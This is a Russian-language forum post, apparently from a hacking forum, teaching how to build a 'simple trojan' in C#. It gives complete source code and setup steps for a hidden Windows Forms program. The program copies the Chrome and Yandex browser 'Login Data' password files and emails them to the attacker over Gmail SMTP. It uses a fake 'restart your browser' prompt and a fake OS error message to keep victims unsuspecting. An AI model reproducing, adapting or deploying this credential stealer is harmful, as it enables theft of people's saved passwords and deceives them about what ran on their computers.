Простенький троян на C#

Stass

Проверка на авторские статьи.
Главный редактор
Статус
Offline
С нами
Сообщения
169
Симпатии
6
Розыгрыши
0
#1
В данной программе мы будем доставать пароли из яндекса и хрома и отправлять их себе, они не будут расшифровываться.

Весь код, кому не хочется читать:
Код:
using System;
using System.Threading.Tasks;
using System.Windows.Forms;
using System.Net.Mail;
using System.IO;
using System.Net;
using System.Threading;
namespace Troyan
{
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
            string localappdata = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData);
            string ChromeLogs = localappdata + @"\Google\Chrome\User Data\Default\Login Data";
            string YaLogs = localappdata + @"\Yandex\YandexBrowser\User Data\Default\Login Data";
            MailAddress from = new MailAddress("your@gmail.com");
            MailAddress to = new MailAddress("your@gmail.com");
            MailMessage message = new MailMessage(from, to);
            message.Subject = "Логи";
            message.Body = "Вот пароли";
            MessageBox.Show("Please restart your browser", "Error");
            while (true)
            {
                if (File.Exists(ChromeLogs) && File.Exists(YaLogs) == false)
                {
            
                        try
                        {
                            message.Attachments.Add(new Attachment(ChromeLogs));

                            SmtpClient smtp = new SmtpClient("smtp.gmail.com", 587);
                            smtp.Credentials = new NetworkCredential("your@gmail.com", "123");
                            smtp.EnableSsl = true;
                            smtp.Send(message);
                            break;
                        }
                        catch
                        {
                            Console.Write('s');
                        }
                }

            
                    if (File.Exists(YaLogs) && File.Exists(ChromeLogs) == false)
                    {
                        try
                        {
                            message.Attachments.Add(new Attachment(YaLogs));

                            SmtpClient smtp = new SmtpClient("smtp.gmail.com", 587);
                            smtp.Credentials = new NetworkCredential("your@gmail.com", "123");
                            smtp.EnableSsl = true;
                            smtp.Send(message);
                            break;
                        }
                        catch
                        {
                            Console.Write('s');
                        }

                    }
                    if ((File.Exists(YaLogs) == true && File.Exists(ChromeLogs) == true))
                    {
                        try
                        {
                            message.Attachments.Add(new Attachment(YaLogs));
                            message.Attachments.Add(new Attachment(ChromeLogs));

                            SmtpClient smtp = new SmtpClient("smtp.gmail.com", 587);
                            smtp.Credentials = new NetworkCredential("your@gmail.com", "123");
                            smtp.EnableSsl = true;
                            smtp.Send(message);
                            break;
                        }
                        catch
                        {
                            Console.Write('s');
                        }
                    }


                }

            MessageBox.Show("This programm cannot be run on your os", "Error");
            }
        }
    }
Создаём проект - Windows Forms.
Заходим в свойства формы и ставим такие значения:
  • FormBorderStyle : None
  • Text : Оставляем пустоту
  • Enabled : False
  • ShowIcon : False
  • TopMost : False
  • TransparencyKey : жмякаем >> система >> control
  • CausesValidation : False
  • SizeGripStyle : Hide
Библиотеки которые нам понадобятся:
Код:
sing System;
using System.Threading.Tasks;
using System.Windows.Forms;
using System.Net.Mail;
using System.IO;
using System.Net;
using System.Threading;
Теперь получаем пути до яндекса и хрома. Пароли практически всегда находятся в файле Login Data.
Код:
InitializeComponent();
            string localappdata = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData);
            string ChromeLogs = localappdata + @"\Google\Chrome\User Data\Default\Login Data";
            string YaLogs = localappdata + @"\Yandex\YandexBrowser\User Data\Default\Login Data";
            MailAddress from = new MailAddress("your@gmail.com");
            MailAddress to = new MailAddress("your@gmail.com");
            MailMessage message = new MailMessage(from, to);
            message.Subject = "Логи";
            message.Body = "Вот пароли";
            MessageBox.Show("Please restart your browser", "Error");
Также Браузеры не дают проводить никаких действий с этими файлами, пока они открыты, поэтому вежливо просим закрыть браузер (ИЛИ ПО ХАРДКОРУ Procces.kill()).
Код:
while (true)
            {
                if (File.Exists(ChromeLogs) && File.Exists(YaLogs) == false)
                {
        
                        try
                        {
                            message.Attachments.Add(new Attachment(ChromeLogs));

                            SmtpClient smtp = new SmtpClient("smtp.gmail.com", 587);
                            smtp.Credentials = new NetworkCredential("your@gmail.com", "123");
                            smtp.EnableSsl = true;
                            smtp.Send(message);
                            break;
                        }
                        catch
                        {
                            Console.Write('s');
                        }
                }

        
                    if (File.Exists(YaLogs) && File.Exists(ChromeLogs) == false)
                    {
                        try
                        {
                            message.Attachments.Add(new Attachment(YaLogs));

                            SmtpClient smtp = new SmtpClient("smtp.gmail.com", 587);
                            smtp.Credentials = new NetworkCredential("your@gmail.com", "123");
                            smtp.EnableSsl = true;
                            smtp.Send(message);
                            break;
                        }
                        catch
                        {
                            Console.Write('s');
                        }

                    }
                    if ((File.Exists(YaLogs) == true && File.Exists(ChromeLogs) == true))
                    {
                        try
                        {
                            message.Attachments.Add(new Attachment(YaLogs));
                            message.Attachments.Add(new Attachment(ChromeLogs));

                            SmtpClient smtp = new SmtpClient("smtp.gmail.com", 587);
                            smtp.Credentials = new NetworkCredential("your@gmail.com", "123");
                            smtp.EnableSsl = true;
                            smtp.Send(message);
                            break;
                        }
                        catch
                        {
                            Console.Write('s');
                        }
                    }


                }

 
            MessageBox.Show("Programm cannot be run on your os, Error 54", "Error");
            }
        }
    }
Теперь мы запускаем цикл, который проверяет какие браузеры установлены и уже отталкиваясь от этого выполняет определенные действия. Также этот цикл будет работать до тех пор пока не получит доступа к файлам, т.е пока браузер не закроется, а дальше логи отправятся уже вам на почту. Скрипт не отображается в процессах. Его можно увидеть только если перейти во вкладку подробности. А в конце мы выводим ошибку, чтобы у пользователя не было лишних подозрений. Пусть лучше думает, что проблема в его компьютере.